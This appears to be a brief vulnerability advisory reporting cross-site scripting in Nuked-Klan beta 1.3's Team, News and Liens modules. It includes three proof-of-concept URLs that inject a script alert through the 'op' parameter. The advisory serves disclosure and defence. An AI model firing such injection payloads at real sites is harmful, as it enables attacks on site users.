11 lines
No EOL
647 B
Text
Executable file
11 lines
No EOL
647 B
Text
Executable file
source: http://www.securityfocus.com/bid/6916/info
|
|
|
|
It has been reported that Nuked-Klan beta 1.3 is prone to cross site scripting attacks. The problem occurs in the 'Team', 'News', and 'Liens' modules which fails to sufficiently sanitize user-supplied HTML and script code located in URI parameters.
|
|
|
|
This vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may also be affected.
|
|
|
|
http://www.example.org/index.php?file=Team&op=<script>alert('Test');</script>
|
|
|
|
http://www.example.org/index.php?file=News&op=<script>alert('test');</script>
|
|
|
|
http://www.example.org/index.php?file=Liens&op=<script>alert('test');</script> |